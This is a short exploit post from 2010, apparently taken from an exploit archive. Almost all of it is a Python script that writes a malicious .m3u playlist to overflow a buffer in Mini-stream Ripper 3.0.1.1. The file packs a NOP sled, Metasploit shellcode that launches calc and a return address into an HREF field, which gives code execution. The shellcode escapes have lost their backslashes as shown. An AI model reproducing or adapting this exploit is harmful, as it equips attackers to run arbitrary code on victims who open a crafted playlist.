Mini-stream Ripper 3.0.1.1 (.m3u) HREF Buffer Overflow Explo
Posted on 10 March 2010
============================================================== Mini-stream Ripper 3.0.1.1 (.m3u) HREF Buffer Overflow Exploit ============================================================== #!/usr/bin/env python #Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution #Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe #Author: l3D nops1='x90'*0x2a80 #system("calc") - Metasploit.com shellcode=("xb8x19xfcx3cx9bxd9xc4x31xc9xb1x32xd9x74x24xf4" "x5bx83xebxfcx31x43x0ex03x5axf2xdex6exa0xe2x96" "x91x58xf3xc8x18xbdxc2xdax7fxb6x77xebxf4x9ax7b" "x80x59x0ex0fxe4x75x21xb8x43xa0x0cx39x62x6cxc2" "xf9xe4x10x18x2exc7x29xd3x23x06x6dx09xcbx5ax26" "x46x7ex4bx43x1ax43x6ax83x11xfbx14xa6xe5x88xae" "xa9x35x20xa4xe2xadx4axe2xd2xccx9fxf0x2fx87x94" "xc3xc4x16x7dx1ax24x29x41xf1x1bx86x4cx0bx5bx20" "xafx7ex97x53x52x79x6cx2ex88x0cx71x88x5bxb6x51" "x29x8fx21x11x25x64x25x7dx29x7bxeaxf5x55xf0x0d" "xdaxdcx42x2axfex85x11x53xa7x63xf7x6cxb7xcbxa8" "xc8xb3xf9xbdx6bx9ex97x40xf9xa4xdex43x01xa7x70" "x2cx30x2cx1fx2bxcdxe7x64xc3x87xaaxccx4cx4ex3f" "x4dx11x71x95x91x2cxf2x1cx69xcbxeax54x6cx97xac" "x85x1cx88x58xaaxb3xa9x48xc9x52x3ax10x0e") nops2='x90'*(0xa9ff-len(nops1+shellcode)) ret='x30x3Dx0D' payload=nops1+shellcode+nops2+ret evil="""<ASX Version="3.0"> <ENTRY> <REF HREF="%s"/> </ENTRY> </ASX> """ % payload bad=open('crash.m3u', 'w') bad.write(evil) bad.close() # ~ - [ [ : Inj3ct0r : ] ]